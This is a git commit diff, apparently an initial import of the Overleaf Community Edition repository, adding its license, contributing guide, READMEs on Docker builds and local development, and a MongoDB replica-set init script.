commit ff9c54d5e4e8fbd83223ea5eac17042ef869fa8b
Author: Yu Cong
Date:   Thu Apr 24 13:11:28 2025 +0800

    first commit

diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..3b4a832
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,9 @@
+# docker image build
+.dockerignore
+
+# user defined files
+.env
+docker-compose.override.yml
+mongo_data/
+redis_data/
+sharelatex_data/
\ No newline at end of file
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
new file mode 100644
index 0000000..5217640
--- /dev/null
+++ b/CONTRIBUTING.md
@@ -0,0 +1,43 @@
+Contributing to Overleaf
+==========================
+
+Thank you for reading this! If you'd like to report a bug or join in the development
+of Overleaf, then here are some notes on how to do that.
+
+Reporting bugs and opening issues
+---------------------------------
+
+If you'd like to report a bug or open an issue, please **[check if there is an existing issue](https://github.com/overleaf/overleaf/issues).**
+If there is, please add any more information that you have, or give it a 👍.
+
+When submitting an issue, please describe it as clearly as possible, including how to
+reproduce the bug, which situations it appears in, what you expected to happen, and what actually happens.
+For front-end issues, including a screenshot is very helpful.
+
+**Note**: If you are using [www.overleaf.com](https://www.overleaf.com) and have a problem, or if you would like to request a new feature, please contact the Support team at support@overleaf.com. Raise an issue here only to report bugs in the Community Edition release of Overleaf.
+
+Pull Requests
+-------------
+
+See [our wiki](https://github.com/overleaf/overleaf/wiki)
+for how to manage the Overleaf development environment and for our developer guidelines.
+
+We love pull requests, so be bold with them! Don't be afraid of going ahead
+and changing something, or adding a new feature. We're very happy to work with you
+to get your changes merged into Overleaf.
+
+If you're looking for something to work on, have a look at the [open issues](https://github.com/overleaf/overleaf/issues).
+
+Security
+--------
+
+Please see [our security policy](https://github.com/overleaf/overleaf/security/policy) if you would like to report a potential security vulnerability.
+
+Contributor License Agreement
+-----------------------------
+
+Before we can accept any contributions of code, we need you to agree to our
+[Contributor License Agreement](https://docs.google.com/forms/d/e/1FAIpQLSef79XH3mb7yIiMzZw-yALEegS-wyFetvjTiNBfZvf_IHD2KA/viewform?usp=sf_link).
+This is to ensure that you own the copyright of your contribution, and that you
+agree to give us a license to use it in both the open source version, and the version
+of Overleaf running at www.overleaf.com, which may have additional changes.
diff --git a/LICENSE b/LICENSE
new file mode 100644
index 0000000..dba13ed
--- /dev/null
+++ b/LICENSE
@@ -0,0 +1,661 @@
+                    GNU AFFERO GENERAL PUBLIC LICENSE
+                       Version 3, 19 November 2007
+
+ Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+                            Preamble
+
+  The GNU Affero General Public License is a free, copyleft license for
+software and other kinds of works, specifically designed to ensure
+cooperation with the community in the case of network server software.
+ + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +our General Public Licenses are intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + Developers that use our General Public Licenses protect your rights +with two steps: (1) assert copyright on the software, and (2) offer +you this License which gives you legal permission to copy, distribute +and/or modify the software. + + A secondary benefit of defending all users' freedom is that +improvements made in alternate versions of the program, if they +receive widespread use, become available for other developers to +incorporate. Many developers of free software are heartened and +encouraged by the resulting cooperation. However, in the case of +software used on network servers, this result may fail to come about. +The GNU General Public License permits making a modified version and +letting the public access it on a server without ever releasing its +source code to the public. + + The GNU Affero General Public License is designed specifically to +ensure that, in such cases, the modified source code becomes available +to the community. It requires the operator of a network server to +provide the source code of the modified version running there to the +users of that server. Therefore, public use of a modified version, on +a publicly accessible server, gives the public access to the source +code of the modified version. + + An older license, called the Affero General Public License and +published by Affero, was designed to accomplish similar goals. This is +a different license, not a version of the Affero GPL, but Affero has +released a new version of the Affero GPL which permits relicensing under +this license. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU Affero General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. 
Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. 
This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. 
+ + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. 
+ + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. 
(Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. 
+ + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. 
+ + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. 
If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. + + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU Affero General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU Affero General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 
+ + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU Affero General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU Affero General Public License for more details. + + You should have received a copy of the GNU Affero General Public License + along with this program. If not, see . + +Also add information on how to contact you by electronic and paper mail. + + If your software can interact with users remotely through a computer +network, you should also make sure that it provides a way for users to +get its source. For example, if your program is a web application, its +interface could display a "Source" link that leads users to an archive +of the code. There are many ways you could offer source, and different +solutions will be better for different programs; see section 13 for the +specific requirements. + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU AGPL, see +. diff --git a/README.md b/README.md new file mode 100644 index 0000000..4895254 --- /dev/null +++ b/README.md @@ -0,0 +1,76 @@ +

+# Overleaf
+
+An open-source online real-time collaborative LaTeX editor.
+
+[Wiki](https://github.com/overleaf/overleaf/wiki) •
+[Server Pro](https://www.overleaf.com/for/enterprises) •
+[Contributing](CONTRIBUTING.md) •
+[Mailing List](https://mailchi.mp/overleaf.com/community-edition-and-server-pro) •
+[Authors](https://www.overleaf.com/about) •
+[License](LICENSE)
+
+![A screenshot of a project being edited in Overleaf Community Edition](doc/screenshot.png)
+
+*Figure 1: A screenshot of a project being edited in Overleaf Community Edition.*
+ +## Community Edition + +[Overleaf](https://www.overleaf.com) is an open-source online real-time collaborative LaTeX editor. We run a hosted version at [www.overleaf.com](https://www.overleaf.com), but you can also run your own local version, and contribute to the development of Overleaf. + +## Enterprise + +If you want help installing and maintaining Overleaf in your lab or workplace, we offer an officially supported version called [Overleaf Server Pro](https://www.overleaf.com/for/enterprises). It also includes more features for security (SSO with LDAP or SAML), administration and collaboration (e.g. tracked changes). [Find out more!](https://www.overleaf.com/for/enterprises) + +## Keeping up to date + +Sign up to the [mailing list](https://mailchi.mp/overleaf.com/community-edition-and-server-pro) to get updates on Overleaf releases and development. + +## Installation + +We have detailed installation instructions in the [Overleaf Toolkit](https://github.com/overleaf/toolkit/). + +## Upgrading + +If you are upgrading from a previous version of Overleaf, please see the [Release Notes section on the Wiki](https://github.com/overleaf/overleaf/wiki#release-notes) for all of the versions between your current version and the version you are upgrading to. + +## Overleaf Docker Image + +This repo contains two dockerfiles, [`Dockerfile-base`](server-ce/Dockerfile-base), which builds the +`sharelatex/sharelatex-base` image, and [`Dockerfile`](server-ce/Dockerfile) which builds the +`sharelatex/sharelatex` (or "community") image. + +The Base image generally contains the basic dependencies like `wget`, plus `texlive`. +We split this out because it's a pretty heavy set of +dependencies, and it's nice to not have to rebuild all of that every time. + +The `sharelatex/sharelatex` image extends the base image and adds the actual Overleaf code +and services. + +Use `make build-base` and `make build-community` from `server-ce/` to build these images. + +We use the [Phusion base-image](https://github.com/phusion/baseimage-docker) +(which is extended by our `base` image) to provide us with a VM-like container +in which to run the Overleaf services. Baseimage uses the `runit` service +manager to manage services, and we add our init-scripts from the `server-ce/runit` +folder. + + +## Contributing + +Please see the [CONTRIBUTING](CONTRIBUTING.md) file for information on contributing to the development of Overleaf. + +## Authors + +[The Overleaf Team](https://www.overleaf.com/about) + +## License + +The code in this repository is released under the GNU AFFERO GENERAL PUBLIC LICENSE, version 3. A copy can be found in the [`LICENSE`](LICENSE) file. + +Copyright (c) Overleaf, 2014-2025. 
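For reference, the image builds described in the README above boil down to the following commands — a minimal sketch, assuming you run them from the repository root with Docker and `make` available:

```shell
# Build the heavy base image first (basic dependencies plus texlive).
# This layer changes rarely, so it is worth keeping cached.
cd server-ce
make build-base

# Then build the community image, which layers the Overleaf code and
# services on top of sharelatex/sharelatex-base.
make build-community
```

Splitting the build this way means day-to-day rebuilds only re-run the lighter community layer rather than reinstalling TeX Live.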
diff --git a/bin/shared/mongodb-init-replica-set.js b/bin/shared/mongodb-init-replica-set.js
new file mode 100644
index 0000000..30af660
--- /dev/null
+++ b/bin/shared/mongodb-init-replica-set.js
@@ -0,0 +1,3 @@
+/* eslint-disable no-undef */
+
+rs.initiate({ _id: 'overleaf', members: [{ _id: 0, host: 'mongo:27017' }] })
diff --git a/develop/.gitignore b/develop/.gitignore
new file mode 100644
index 0000000..bb5888b
--- /dev/null
+++ b/develop/.gitignore
@@ -0,0 +1,3 @@
+/compiles/*
+!.gitkeep
+.env
\ No newline at end of file
diff --git a/develop/README.md b/develop/README.md
new file mode 100644
index 0000000..568259c
--- /dev/null
+++ b/develop/README.md
@@ -0,0 +1,89 @@
+# Overleaf Community Edition, development environment
+
+## Building and running
+
+In this `develop` directory, build the services:
+
+```shell
+bin/build
+```
+
+> [!NOTE]
+> If Docker is running out of RAM while building the services in parallel, create a `.env` file in this directory containing `COMPOSE_PARALLEL_LIMIT=1`.
+
+Then start the services:
+
+```shell
+bin/up
+```
+
+Once the services are running, open <http://localhost/launchpad> to create the first admin account.
+
+## TeX Live
+
+Compiling a PDF requires building a TeX Live image to handle the compilation inside Docker:
+
+```shell
+docker build texlive -t texlive-full
+```
+
+> [!NOTE]
+> To compile on a macOS host, you may need to override the path to the Docker socket by creating a `.env` file in this directory, containing
+> `DOCKER_SOCKET_PATH=/var/run/docker.sock.raw`
+
+## Development
+
+To avoid running `bin/build && bin/up` after every code change, you can run Overleaf
+Community Edition in _development mode_, where services automatically update on code changes.
+
+To do this, use the included `bin/dev` script:
+
+```shell
+bin/dev
+```
+
+This will start all services using `node --watch`, which automatically monitors the code and restarts the services as necessary.
+
+To improve performance, you can start only a subset of the services in development mode by providing a space-separated list to the `bin/dev` script:
+
+```shell
+bin/dev [service1] [service2] ... [serviceN]
+```
+
+> [!NOTE]
+> Starting the `web` service in _development mode_ will only update the `web`
+> service when backend code changes. To automatically update frontend code as
+> well, make sure to also start the `webpack` service in _development mode_.
+
+If no services are named, all services will start in development mode.
+
+## Debugging
+
+When run in _development mode_, most services expose a debugging port to which
+you can attach a debugger such as
+[the inspector in Chrome's Dev Tools](chrome://inspect/) or one integrated into
+an IDE. The following table shows the port exposed on the **host machine** for
+each service:
+
+| Service            | Port |
+| ------------------ | ---- |
+| `web`              | 9229 |
+| `clsi`             | 9230 |
+| `chat`             | 9231 |
+| `contacts`         | 9232 |
+| `docstore`         | 9233 |
+| `document-updater` | 9234 |
+| `filestore`        | 9235 |
+| `notifications`    | 9236 |
+| `real-time`        | 9237 |
+| `history-v1`       | 9239 |
+| `project-history`  | 9240 |
+
+To attach to a service using Chrome's _remote debugging_, go to
+<chrome://inspect> and make sure _Discover network targets_ is checked. Next,
+click _Configure..._ and add an entry `localhost:[service port]` for each of the
+services you want to attach a debugger to.
+
+After adding an entry, the service will show up as a _Remote Target_ that you
+can inspect and debug.
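As a usage example — a minimal sketch, assuming the services are already up in development mode — you can also attach a debugger from the host without Chrome, by pointing Node's built-in command-line debugger at one of the ports from the table above:

```shell
# Start only the web and webpack services in development mode.
bin/dev web webpack

# Attach Node's CLI debugger to the inspector port that the web
# service exposes on the host (9229, per the table above).
node inspect 127.0.0.1:9229
```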
